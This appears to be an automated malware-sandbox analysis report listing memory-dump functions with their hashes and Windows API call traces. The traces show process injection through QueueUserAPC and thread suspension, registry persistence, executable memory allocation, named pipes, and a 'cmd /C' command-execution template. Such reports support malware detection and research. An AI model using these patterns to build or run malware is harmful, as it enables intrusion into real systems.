  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
